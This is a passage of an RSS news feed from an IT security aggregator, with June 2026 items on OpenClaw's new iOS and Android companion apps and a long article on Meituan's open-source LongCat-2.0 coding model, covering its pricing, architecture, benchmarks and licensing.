<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/openclaw-for-ios-the-viral-open-source-ai-agent-comes-to-iphone-and-ipad/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/openclaw-for-ios-the-viral-open-source-ai-agent-comes-to-iphone-and-ipad/">OpenClaw for iOS: The viral open-source AI agent comes to iPhone and iPad</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenClaw for iOS: The viral open-source AI agent comes to iPhone and iPad]]></title>
<description><![CDATA[OpenClaw, a self-hosted personal AI assistant that connects to existing chat apps, is now available on iPhone, iPad and Apple Watch. The release brings chat, real-time voice conversations, approvals, device capabilities, and private automations to iOS. Connecting OpenClaw to iPhone The app pairs ...]]></description>
<link>https://tsecurity.de/de/3634862/it-security-nachrichten/openclaw-for-ios-the-viral-open-source-ai-agent-comes-to-iphone-and-ipad/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634862/it-security-nachrichten/openclaw-for-ios-the-viral-open-source-ai-agent-comes-to-iphone-and-ipad/</guid>
<pubDate>Tue, 30 Jun 2026 09:53:01 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>OpenClaw, a self-hosted personal AI assistant that connects to existing chat apps, is now available on iPhone, iPad and Apple Watch. The release brings chat, real-time voice conversations, approvals, device capabilities, and private automations to iOS. Connecting OpenClaw to iPhone The app pairs with an OpenClaw Gateway, enabling users to communicate with their AI assistant through text or voice, approve requested actions, and securely access iPhone features. Running on the user’s own devices, OpenClaw supports … <a href="https://www.helpnetsecurity.com/2026/06/30/openclaw-ios-app-iphone-ipad/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/06/30/openclaw-ios-app-iphone-ipad/">OpenClaw for iOS: The viral open-source AI agent comes to iPhone and iPad</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Meituan open sources LongCat-2.0, the 1.6T, near-frontier agentic coding model that's been leading OpenRouter — trained entirely on Chinese chips]]></title>
<description><![CDATA[A few hours ago, Chinese delivery app company Meituan officially unveiled LongCat-2.0 on GitHub, Hugging Face, and its native platform, unmasking the model as the computational engine behind "Owl Alpha," the anonymous stealth model that has spent the last two months commanding global developer ch...]]></description>
<link>https://tsecurity.de/de/3634858/it-nachrichten/meituan-open-sources-longcat-20-the-16t-near-frontier-agentic-coding-model-thats-been-leading-openrouter-trained-entirely-on-chinese-chips/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634858/it-nachrichten/meituan-open-sources-longcat-20-the-16t-near-frontier-agentic-coding-model-thats-been-leading-openrouter-trained-entirely-on-chinese-chips/</guid>
<pubDate>Tue, 30 Jun 2026 09:47:52 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A few hours ago, Chinese delivery app company <a href="https://longcat.chat/blog/longcat-2.0/">Meituan officially unveiled LongCat-2.0 </a>on <a href="https://github.com/meituan-longcat/LongCat-2.0">GitHub</a>, <a href="https://huggingface.co/meituan-longcat/LongCat-2.0/blob/main/LICENSE">Hugging Face</a>, and its native platform, unmasking the model as the computational engine behind "Owl Alpha," the anonymous stealth model that has spent the last two months commanding global developer charts on OpenRouter. </p><p>Developed to fundamentally disrupt closed-source enterprise dominance in autonomous software engineering, the 1.6-trillion-parameter Mixture-of-Experts (MoE) system brings a native 1-million-token context window to the public domain under a highly permissive, enterprise grade, commercially viable MIT license. </p><p>Commercial access to the architecture introduces a highly aggressive pricing tier, deploying a mechanism where all context-cache hits are processed completely<i> free of charge</i>, running alongside a time-limited "<a href="https://longcat.chat/platform/docs/TokenPack.html">Token Pack</a>" flash-sale paradigm. There's also a typical <a href="https://longcat.chat/platform/docs/APIPayAsYouGo.html">"pay-as-you-go" API</a> for non-cache hits standard priced at $0.75/$2.95 per million tokens in/out.</p><p>However, a limited-time promotional discount aggressively slashes these operational expenditures down to $0.30 per million tokens for uncached input and $1.20 per million tokens for output, both on the cheaper-end of top performing models globally. </p><table><tbody><tr><td><p><b>Model</b></p></td><td><p><b>Input ($/1M)</b></p></td><td><p><b>Output ($/1M)</b></p></td><td><p><b>Total ($/1M)</b></p></td><td><p><b>Source</b></p></td></tr><tr><td><p>MiMo-V2.5 Flash</p></td><td><p>$0.10</p></td><td><p>$0.30</p></td><td><p>$0.40</p></td><td><p><a href="https://platform.xiaomimimo.com/docs/en-US/pricing">Xiaomi</a></p></td></tr><tr><td><p>deepseek-v4-flash</p></td><td><p>$0.14</p></td><td><p>$0.28</p></td><td><p>$0.42</p></td><td><p><a href="https://api-docs.deepseek.com/quick_start/pricing">DeepSeek</a></p></td></tr><tr><td><p>deepseek-v4-pro</p></td><td><p>$0.435</p></td><td><p>$0.87</p></td><td><p>$1.305</p></td><td><p><a href="https://api-docs.deepseek.com/quick_start/pricing">DeepSeek</a></p></td></tr><tr><td><p>MiniMax-M3</p></td><td><p>$0.30</p></td><td><p>$1.20</p></td><td><p>$1.50</p></td><td><p><a href="https://platform.minimax.io/subscribe/token-plan?tab=api-enterprise">MiniMax</a></p></td></tr><tr><td><p><b>LongCat-2.0 — limited-time promo</b></p></td><td><p><b>$0.30</b></p></td><td><p><b>$1.20</b></p></td><td><p><b>$1.50</b></p></td><td><p><b></b><a href="https://longcat.chat/platform/docs/APIPayAsYouGo.html"><b>LongCat</b></a><b></b></p></td></tr><tr><td><p>Gemini 3.1 Flash-Lite</p></td><td><p>$0.25</p></td><td><p>$1.50</p></td><td><p>$1.75</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>Qwen3.7-Plus</p></td><td><p>$0.40</p></td><td><p>$1.60</p></td><td><p>$2.00</p></td><td><p><a href="https://modelstudio.console.alibabacloud.com/ap-southeast-1?tab=doc#/doc/?type=model&amp;url=2840914_2&amp;modelId=qwen3.7-plus&amp;serviceSite=international">Alibaba Cloud</a></p></td></tr><tr><td><p>MiMo-V2.5</p></td><td><p>$0.40</p></td><td><p>$2.00</p></td><td><p>$2.40</p></td><td><p><a href="https://platform.xiaomimimo.com/docs/en-US/pricing">Xiaomi</a></p></td></tr><tr><td><p><b>LongCat-2.0 — standard</b></p></td><td><p><b>$0.75</b></p></td><td><p><b>$2.95</b></p></td><td><p><b>$3.70</b></p></td><td><p><b></b><a href="https://longcat.chat/platform/docs/APIPayAsYouGo.html"><b>LongCat</b></a></p></td></tr><tr><td><p>Grok 4.3 (low context)</p></td><td><p>$1.25</p></td><td><p>$2.50</p></td><td><p>$3.75</p></td><td><p><a href="https://docs.x.ai/developers/models/grok-4.3">xAI</a></p></td></tr><tr><td><p>MiMo-V2.5 Pro (≤256K)</p></td><td><p>$1.00</p></td><td><p>$3.00</p></td><td><p>$4.00</p></td><td><p><a href="https://platform.xiaomimimo.com/docs/en-US/pricing">Xiaomi</a></p></td></tr><tr><td><p>Kimi-K2.6</p></td><td><p>$0.95</p></td><td><p>$4.00</p></td><td><p>$4.95</p></td><td><p><a href="https://platform.kimi.ai/docs/pricing/chat-k26">Moonshot AI</a></p></td></tr><tr><td><p>GLM-5.2</p></td><td><p>$1.40</p></td><td><p>$4.40</p></td><td><p>$5.80</p></td><td><p><a href="https://docs.z.ai/guides/overview/pricing">Z.ai</a></p></td></tr><tr><td><p>GPT-5.6 Luna</p></td><td><p>$1.00</p></td><td><p>$6.00</p></td><td><p>$7.00</p></td><td><p><a href="https://openai.com/index/previewing-gpt-5-6-sol/">OpenAI</a></p></td></tr><tr><td><p>Grok 4.3 (high context)</p></td><td><p>$2.50</p></td><td><p>$5.00</p></td><td><p>$7.50</p></td><td><p><a href="https://docs.x.ai/developers/models/grok-4.3">xAI</a></p></td></tr><tr><td><p>MiMo-V2.5 Pro (&gt;256K)</p></td><td><p>$2.00</p></td><td><p>$6.00</p></td><td><p>$8.00</p></td><td><p><a href="https://platform.xiaomimimo.com/docs/en-US/pricing">Xiaomi</a></p></td></tr><tr><td><p>Qwen3.7-Max</p></td><td><p>$2.50</p></td><td><p>$7.50</p></td><td><p>$10.00</p></td><td><p><a href="https://modelstudio.console.alibabacloud.com/ap-southeast-1?tab=doc#/doc/?type=model&amp;url=2840914_2&amp;modelId=qwen3.7-max&amp;serviceSite=international">Alibaba Cloud</a></p></td></tr><tr><td><p>Gemini 3.5 Flash</p></td><td><p>$1.50</p></td><td><p>$9.00</p></td><td><p>$10.50</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>Gemini 3.1 Pro Preview (≤200K)</p></td><td><p>$2.00</p></td><td><p>$12.00</p></td><td><p>$14.00</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>GPT-5.6 Terra</p></td><td><p>$2.50</p></td><td><p>$15.00</p></td><td><p>$17.50</p></td><td><p><a href="https://openai.com/index/previewing-gpt-5-6-sol/">OpenAI</a></p></td></tr><tr><td><p>GPT-5.4</p></td><td><p>$2.50</p></td><td><p>$15.00</p></td><td><p>$17.50</p></td><td><p><a href="https://openai.com/api/pricing/">OpenAI</a></p></td></tr><tr><td><p>Gemini 3.1 Pro Preview (&gt;200K)</p></td><td><p>$4.00</p></td><td><p>$18.00</p></td><td><p>$22.00</p></td><td><p><a href="https://ai.google.dev/gemini-api/docs/pricing">Google</a></p></td></tr><tr><td><p>Claude Opus 4.8</p></td><td><p>$5.00</p></td><td><p>$25.00</p></td><td><p>$30.00</p></td><td><p><a href="https://platform.claude.com/docs/en/about-claude/pricing">Anthropic</a></p></td></tr><tr><td><p>GPT-5.5</p></td><td><p>$5.00</p></td><td><p>$30.00</p></td><td><p>$35.00</p></td><td><p><a href="https://openai.com/api/pricing/">OpenAI</a></p></td></tr><tr><td><p>GPT-5.5 Instant (chat-latest)</p></td><td><p>$5.00</p></td><td><p>$30.00</p></td><td><p>$35.00</p></td><td><p><a href="https://developers.openai.com/api/docs/models/chat-latest">OpenAI</a></p></td></tr><tr><td><p>Sakana Fugu Ultra (≤272K)</p></td><td><p>$5.00</p></td><td><p>$30.00</p></td><td><p>$35.00</p></td><td><p><a href="https://console.sakana.ai/pricing#subscription-plan">Sakana AI</a></p></td></tr><tr><td><p>GPT-5.6 Sol</p></td><td><p>$5.00</p></td><td><p>$30.00</p></td><td><p>$35.00</p></td><td><p><a href="https://openai.com/index/previewing-gpt-5-6-sol/">OpenAI</a></p></td></tr><tr><td><p>Claude Fable 5 / Claude Mythos 5</p></td><td><p>$10.00</p></td><td><p>$50.00</p></td><td><p>$60.00</p></td><td><p><a href="https://platform.claude.com/docs/en/about-claude/models/overview">Anthropic</a></p></td></tr></tbody></table><p>What makes the release a definitive inflection point for global tech infrastructure is its operational independence: the massive model was trained entirely on a cluster of over 50,000 domestic Chinese Application-Specific Integrated Circuits (ASICs), proving that near-frontier AI models can be scaled successfully without relying on the typical U.S. Nvidia GPUs that have, to date, powered much of the global generative AI frontier model training effort. </p><p>This successful deployment of alternative silicon signals a profound structural shift. If Chinese conglomerates can consistently iterate trillion-parameter architectures using homegrown ASICs rather than general-purpose GPUs, it would seem to threaten Nvidia's dominance in this sector. </p><p>Crucially, this technological pivot arrives precisely as Washington pressures top-tier American labs to restrict access to their latest models. Following a U.S. governmental request,<a href="https://venturebeat.com/technology/openai-unveils-gpt-5-6-sol-terra-and-luna-models-but-only-accessible-to-limited-preview-partners-for-now-per-us-gov"> OpenAI was forced to limit access to its new GPT-5.6 models</a>, while Anthropic was previously also <a href="https://venturebeat.com/technology/anthropic-blocks-all-public-access-to-claude-fable-5-mythos-5-following-us-government-order-what-enterprises-should-do">ordered by the U.S. </a>to restrict access to its latest Claude Fable 5 / Mythos 5 models, which it took entirely offline in response. At the same time, a growing chorus of <a href="https://www.axios.com/2026/06/29/trump-ai-model-release-delays-tech-backlash">technologists</a>, <a href="https://thehill.com/policy/technology/5925364-ai-regulation-anthropic-trump-administration/">activists</a>, and industry experts warn that these defensive regulatory maneuvers have inadvertently backfired. By locking down Western closed-source models and driving up API costs, the U.S. government has left a wide operational window for global developers seeking affordable, high-performance alternatives like those found in Chinese open source models such as Meituan LongCat-2.0.</p><p>The raw operational metrics backed up the developer enthusiasm: during its unbranded residency on <a href="https://openrouter.ai/openrouter/owl-alpha">OpenRouter, Owl Alpha</a> accounted for approximately 10.1 trillion monthly tokens—averaging 559 billion tokens per day—representing a 242% month-over-month explosion in volume that propelled it into the platform's global top three.</p><p>By the time Meituan stepped forward to claim the architecture, the model had already secured the top ranking on the Hermes Agent workspace, second place on Claude Code deployments, and third place across international OpenClaw environments.</p><h2><b>Technology: Engineering the 1M-Token Sparse Context</b></h2><p>At the core of LongCat-2.0 lies an aggressive optimization of Mixture-of-Experts (MoE) sparsity, scaling total parameters to 1.6 trillion while limiting active computation to an average of 48 billion parameters per token.</p><p>Depending on the structural complexity of a query, the model’s dynamic activation ranges from 33 billion to 56 billion parameters. This design implements a "Zero-Compute Experts" framework, ensuring that routine execution elements pass through lighter subnetworks, entirely eliminating the idle computational overhead that typically penalizes ultra-dense models.</p><p>To sustain a functional 1-million-token context window without incurring catastrophic hardware bottlenecks, Meituan introduced LongCat Sparse Attention (LSA). Designed as an evolutionary iteration of DeepSeek Sparse Attention, LSA resolves the quadratic scoring costs and memory fragmentation that typically plague fine-grained sparse mechanisms through three distinct, orthogonal vectors:</p><ul><li><p><b>Streaming-aware Indexing (SI):</b> This system restructures the token selection pipeline by blending hardware-aligned contiguous data reads with dynamic random selection. By converting fragmented memory access into highly predictable, sequential blocks, the system achieves coalesced High Bandwidth Memory (HBM) utilization and elevated effective bandwidth.</p></li><li><p><b>Cross-Layer Indexing (CLI):</b> Leveraging the empirical reality that attention saliency remains highly stable across adjacent hidden layers, CLI amortizes calculation costs. A single indexing pass successfully guides multiple consecutive layers during inference, a capability reinforced by cross-layer distillation throughout the training phase.</p></li><li><p><b>Hierarchical Indexing (HI):</b> This approach applies a coarse-to-fine, two-stage scoring layout. The indexer performs a rapid, approximate block-level recall to filter candidates, before running fine-grained token selection exclusively on the remaining population.</p></li></ul><p>Furthermore, Meituan integrated an N-gram Embedding module inherited from its lighter model lines. By expanding parameter allocation in sparse dimensions completely orthogonal to the MoE expert layout, the architecture appends 135 billion parameters to a 5-gram token combination framework. </p><p>This expands the core embedding space by roughly 100-fold, allowing the model to capture dense local token relationships and accelerate large-batch inference operations by reducing memory Input/Output (I/O) bottlenecks.</p><h2><b>Product: Post-Training, MOPD Framework and Benchmark Performance</b></h2><p>While generalist large language models prioritize fluid, conversational interfaces, LongCat-2.0 focuses explicitly on multi-step engineering tasks, tool integration, and automated repository manipulation — agentic tasks, in other words. </p><p>In standardized assessments, LongCat-2.0 registers an empirical 59.5 on SWE-bench Pro, surpassing GPT-5.5's benchmark of 58.6. The model further establishes its agentic specialization by marking a 70.8 on Terminal-Bench 2.1, a 77.3 on SWE-bench Multilingual, and a 73.2 on the general corporate workflow simulator FORTE.</p><p>This precise operational behavior is achieved through a structural post-training layer called Multi-Teacher Optimization via Mixture of Specialized Experts (MOPD). Rather than blending raw human feedback into a singular reward function, the MOPD architecture segregates post-training optimization into three independent, highly focused expert clusters.</p><ul><li><p>The <b>Agent Experts</b> are fine-tuned strictly for structural execution, specializing in precise tool invocation, multi-turn API parameter parsing, and self-correcting loop mechanisms to avoid execution stagnation.</p></li><li><p>The <b>Reasoning Experts</b> are optimized in isolation to advance multi-hop logic, complex chain-of-thought engineering, mathematics, and high-level STEM problem-solving.</p></li><li><p>The <b>Interaction Experts</b> focus entirely on human alignment, instruction-following nuances, factual grounding to suppress hallucinations, and maintaining rigid safety guardrails without diminishing the model's overall utility.</p></li></ul><p>By segregating these vectors during post-training, LongCat-2.0 prevents functional degradation. A dynamic gate-routing mechanism then seamlessly fuses these specialized behaviors at runtime, allowing the final model to coordinate deep reasoning, stable tool execution, and safe user interaction simultaneously</p><p>While LongCat-2.0 generally trails premium frontier systems like Claude Opus 4.8 across broad general-agent benchmarks such as FORTE and BrowseComp, it explicitly punches above its weight in software engineering. </p><p>What makes this open-weight architecture special is its hyper-focus on autonomous development; it manages to narrowly exceed OpenAI's proprietary GPT-5.5 on the rigorous software engineering benchmark SWE-bench Pro (scoring 59.5 against 58.6), proving it is highly capable and fiercely competitive for complex coding tasks despite a leaner computational footprint.</p><h2><b>Commercial Framework: Pay-As-You-Go vs. Flash-Sale Token Packs</b></h2><p>Meituan's deployment strategy introduces a specialized commercial model that splits network access between conventional real-time API billing and structured "Token Packs". </p><p>For traditional enterprise integration, standard top-up accounts are available, deducting operational capital in real time based directly on token input and generation metrics.</p><p>However, to accommodate the unpredictable compute bursts characteristic of autonomous development agents, Meituan launched a structured Token Pack framework. Purchased as fixed, one-time volumetric allocations valid for a strict 30-day window, these packages stack directly on top of an organization's existing baseline API account. </p><p>To manage network load across its ASIC clusters, Meituan releases these high-volume packages via limited flash sales four times daily, precisely at 10:00, 16:00, 21:00, and 23:00 Beijing Time on a first-come, first-served basis.The economic standout of this framework is the zero-charge processing of context cache hits. </p><p>In massive agentic environments where a coding assistant must repeatedly read, reference, and modify the same multi-million-token code repository over an extended session, standard architectures penalize developers by charging full pricing for repeated input context. </p><p>Under Meituan's infrastructure, only cache-miss inputs and final token generations consume the package quota. This architecture completely alters the operational cost economics of large-scale agent software development, enabling deep iterative context exploration without compounding costs.</p><h2><b>Licensing: Open-Source Structural Freedom</b></h2><p>By registering the LongCat-2.0 repository under the open-source MIT License, Meituan positions the architecture with maximum legal flexibility for enterprise integration. </p><p>In contrast to copyleft paradigms like the GNU General Public License (GPL)—which legally obligates developers to open-source any derivative frameworks or internal software that links to the code—the MIT license permits near-unrestricted freedom.</p><p>For corporate engineering teams, this legal standard ensures that LongCat-2.0 can be deeply modified, compiled, and hard-coded directly into closed-source commercial applications, proprietary dev tools, and internal automation backends. </p><p>Corporations can fork the repository, optimize the internal LSA mechanisms for private databases, and sell the resulting software stack to end users without any obligation to disclose their proprietary intellectual property or structural enhancements.</p><h2><b>Meituan's Evolution: From Delivery Super App to AI Powerhouse</b></h2><p>Founded in March 2010 by serial entrepreneur <a href="https://www.howtheybegan.com/founders/wang-xing">Wang Xing</a>, Meituan initially launched as a Groupon-style daily deals website before rapidly evolving into one of China’s dominant “super apps”. </p><p>Following a massive 2015 merger with Dianping, the Beijing-based tech giant solidified a dominant market share over the country's urban delivery corridors, bridging local consumer reviews, instant retail, hotel bookings, and food delivery. Operating as a publicly traded powerhouse on the Hong Kong Stock Exchange, Meituan claims over 770 million annual transacting users and supports a network of more than 14.5 million merchants. </p><p>However, faced with intense domestic market competition, severe margin compression, and a sliding profit margin, the company aggressively pivoted its strategy beyond logistics. Meituan publicly committed to investing "billions" into artificial intelligence and domestic chip capabilities to revitalize its technology-driven offerings. </p><p>This strategic shift into the global AI race began materializing in late 2025 with the release of LongCat-Flash, a 560-billion-parameter Mixture-of-Experts foundation model, followed quickly by the advanced reasoning model LongCat-Flash-Thinking. By open-sourcing these frontier-class models under enterprise-friendly licenses, Meituan signaled its ambition to become a foundational player in global AI infrastructure rather than remaining strictly a regional e-commerce and delivery giant. </p><h2><b>Enterprise Implications: Autonomous Operational Workflows</b></h2><p>For modern enterprises, the release of LongCat-2.0 unlocks clear operational strategies across software engineering, system operations, and long-form data interpretation. </p><p>The combination of an open-weight, MIT-licensed model with an expansive 1-million-token context window means organizations can bypass the data privacy concerns and recurring overhead associated with hosting proprietary third-party APIs.In large-scale enterprise development environments, teams can leverage the model's specialized Agent Experts to orchestrate autonomous codebase migrations. </p><p>Instead of dedicating hundreds of developer hours to manually rewriting legacy application frameworks, engineers can pass an entire enterprise repository along with modern SDK documentation directly into the 1-million-token context window. LongCat-2.0 can map the dependencies, execute the repository-level structural updates, compile the new codebase, and catch compilation and execution bugs autonomously within local sandbox environments before generating a final pull request.</p><p>The model's architectural separation via the MOPD gate-routing mechanism yields significant advantages for strict enterprise compliance. By routing specific operational queries through isolated expert clusters, a financial institution or healthcare firm can deploy deep logic and mathematical reasoning passes without risking factual hallucination or violating strict safety bounds. </p><p>The Interaction Experts function as an implicit guardrail layer, suppressing errors and enforcing instruction-following protocols without degrading the raw processing power of the internal Reasoning Experts. Combined with the zero-cost caching model, enterprises can maintain hyper-focused autonomous software networks that can repeatedly inspect corporate data pools, continuously maintaining and optimizing internal infrastructure at a fraction of standard operational costs.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Künstliche Intelligenz: Openclaw bekommt eigene Apps für iOS und Android]]></title>
<description><![CDATA[Die Open-Source-KI Openclaw lässt sich per iOS- und Android-App steuern. Die Mobilgeräte dienen dabei als selbstgehostete Knotenpunkte. (Openclaw, KI)]]></description>
<link>https://tsecurity.de/de/3634852/it-nachrichten/kuenstliche-intelligenz-openclaw-bekommt-eigene-apps-fuer-ios-und-android/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634852/it-nachrichten/kuenstliche-intelligenz-openclaw-bekommt-eigene-apps-fuer-ios-und-android/</guid>
<pubDate>Tue, 30 Jun 2026 09:47:44 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die Open-Source-KI Openclaw lässt sich per iOS- und Android-App steuern. Die Mobilgeräte dienen dabei als selbstgehostete Knotenpunkte. (<a href="https://www.golem.de/specials/openclaw/">Openclaw</a>, <a href="https://www.golem.de/specials/ki/">KI</a>) <img src="https://cpx.golem.de/cpx.php?class=17&amp;aid=210324&amp;page=1&amp;ts=1782804662" alt="" width="1" height="1">]]></content:encoded>
</item>
<item>
<title><![CDATA[„Die schlechteste App, die ich in meinem Leben genutzt habe“: Openclaws Android-App sorgt für verärgerte Nutzer]]></title>
<description><![CDATA[Die Verantwortlichen hinter Openclaw haben dedizierte iOS- und Android-Apps für den KI-Assistenten veröffentlicht. Während die Version für iPhones einen guten ersten Eindruck hinterlässt, ist es bei der Android-Variante etwas anders.
weiterlesen auf t3n.de]]></description>
<link>https://tsecurity.de/de/3634834/it-nachrichten/die-schlechteste-app-die-ich-in-meinem-leben-genutzt-habe-openclaws-android-app-sorgt-fuer-veraergerte-nutzer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634834/it-nachrichten/die-schlechteste-app-die-ich-in-meinem-leben-genutzt-habe-openclaws-android-app-sorgt-fuer-veraergerte-nutzer/</guid>
<pubDate>Tue, 30 Jun 2026 09:31:21 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die Verantwortlichen hinter Openclaw haben dedizierte iOS- und Android-Apps für den KI-Assistenten veröffentlicht. Während die Version für iPhones einen guten ersten Eindruck hinterlässt, ist es bei der Android-Variante etwas anders.
<a href="https://t3n.de/news/openclaw-android-app-veraergerte-nutzer-1750191/?utm_source=rss&amp;utm_medium=newsFeed&amp;utm_campaign=newsFeed">weiterlesen auf t3n.de</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenClaw-Alternativen 2026: Cloud-native Frameworks für skalierbare KI-Agenten]]></title>
<description><![CDATA[OpenClaw ist stark, aber nicht für jedes Szenario die richtige Wahl. Wir zeigen fünf spezialisierte Alternativen im Vergleich: von fertigen RAG-Plattformen über schlanke Runtimes bis hin zu sicherer Code-Ausführung in der Cloud. Erfahren Sie, welche Lösung sich wann lohnt und wo die Grenzen liegen.]]></description>
<link>https://tsecurity.de/de/3634765/server/openclaw-alternativen-2026-cloud-native-frameworks-fuer-skalierbare-ki-agenten/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634765/server/openclaw-alternativen-2026-cloud-native-frameworks-fuer-skalierbare-ki-agenten/</guid>
<pubDate>Tue, 30 Jun 2026 09:00:29 +0200</pubDate>
<category>🐧 Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img src="https://www.ionos.de/digitalguide/fileadmin/DigitalGuide/Teaser/OpenClaw-Alternativen.png" width="1678" height="937" alt=""><br>OpenClaw ist stark, aber nicht für jedes Szenario die richtige Wahl. Wir zeigen fünf spezialisierte Alternativen im Vergleich: von fertigen RAG-Plattformen über schlanke Runtimes bis hin zu sicherer Code-Ausführung in der Cloud. Erfahren Sie, welche Lösung sich wann lohnt und wo die Grenzen liegen.]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenClaw wird mobil: iOS- und Android-App offiziell verfügbar]]></title>
<description><![CDATA[OpenClaw hat eine mobile Gateway-App für Android und iOS veröffentlicht. Damit sollen Nutzer ihre bereits eingerichtete private OpenClaw-Umgebung auch unterwegs nutzen können, und zwar ohne Telegram und Co. Die App wird per QR-Code oder Setup-Code mit dem eigenen Gateway gekoppelt....Zum Beitrag:...]]></description>
<link>https://tsecurity.de/de/3634727/it-nachrichten/openclaw-wird-mobil-ios-und-android-app-offiziell-verfuegbar/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634727/it-nachrichten/openclaw-wird-mobil-ios-und-android-app-offiziell-verfuegbar/</guid>
<pubDate>Tue, 30 Jun 2026 08:32:27 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[OpenClaw hat eine mobile Gateway-App für Android und iOS veröffentlicht. Damit sollen Nutzer ihre bereits eingerichtete private OpenClaw-Umgebung auch unterwegs nutzen können, und zwar ohne Telegram und Co. Die App wird per QR-Code oder Setup-Code mit dem eigenen Gateway gekoppelt....<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/openclaw-wird-mobil-ios-und-android-app-offiziell-verfuegbar/">OpenClaw wird mobil: iOS- und Android-App offiziell verfügbar</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
    <strong>Auf dem Laufenden bleiben?</strong>
    <br>
    <a href="https://www.google.com/preferences/source?q=stadt-bremerhaven.de">Fügt uns doch bei Google als bevorzugte Quelle hinzu!</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[v2026.6.11]]></title>
<description><![CDATA[openclaw 2026.6.11]]></description>
<link>https://tsecurity.de/de/3634448/downloads/v2026611/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634448/downloads/v2026611/</guid>
<pubDate>Tue, 30 Jun 2026 05:31:21 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>openclaw 2026.6.11</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenClaw Releases iOS and Android Companion Node Apps That Connect a Phone to a Self-Hosted AI Agent Gateway]]></title>
<description><![CDATA[OpenClaw's iOS and Android apps are companion nodes, not standalone chatbots. Each phone pairs to a self-hosted Gateway over WebSocket. This adds device hardware — camera, location, voice, and Canvas — to a local-first AI agent. Here is the architecture, the capabilities, and the trade-offs for b...]]></description>
<link>https://tsecurity.de/de/3634251/ai-nachrichten/openclaw-releases-ios-and-android-companion-node-apps-that-connect-a-phone-to-a-self-hosted-ai-agent-gateway/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634251/ai-nachrichten/openclaw-releases-ios-and-android-companion-node-apps-that-connect-a-phone-to-a-self-hosted-ai-agent-gateway/</guid>
<pubDate>Tue, 30 Jun 2026 01:48:24 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>OpenClaw's iOS and Android apps are companion nodes, not standalone chatbots. Each phone pairs to a self-hosted Gateway over WebSocket. This adds device hardware — camera, location, voice, and Canvas — to a local-first AI agent. Here is the architecture, the capabilities, and the trade-offs for builders.</p>
<p>The post <a href="https://www.marktechpost.com/2026/06/29/openclaw-releases-ios-and-android-companion-node-apps-that-connect-a-phone-to-a-self-hosted-ai-agent-gateway/">OpenClaw Releases iOS and Android Companion Node Apps That Connect a Phone to a Self-Hosted AI Agent Gateway</a> appeared first on <a href="https://www.marktechpost.com/">MarkTechPost</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[There's now an OpenClaw app for iOS and Android phones]]></title>
<description><![CDATA[Smartphones are welcoming the agentic AI overlords.]]></description>
<link>https://tsecurity.de/de/3634168/it-nachrichten/theres-now-an-openclaw-app-for-ios-and-android-phones/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3634168/it-nachrichten/theres-now-an-openclaw-app-for-ios-and-android-phones/</guid>
<pubDate>Tue, 30 Jun 2026 00:17:39 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Smartphones are welcoming the agentic AI overlords.]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft macht Windows 11 zum KI-Betriebssystem]]></title>
<description><![CDATA[Sprachgesteuerte, kontinuierlich laufende KI-Agenten sollen künftig die Arbeit mit Microsoft Windows vereinfachen.Melnikov Dmitriy / Shutterstock.com



Seit Jahren bewirbt Microsoft Windows 11 als Betriebssystem mit KI-Funktionen. Nun schafft das Unternehmen endlich die Voraussetzungen für diese...]]></description>
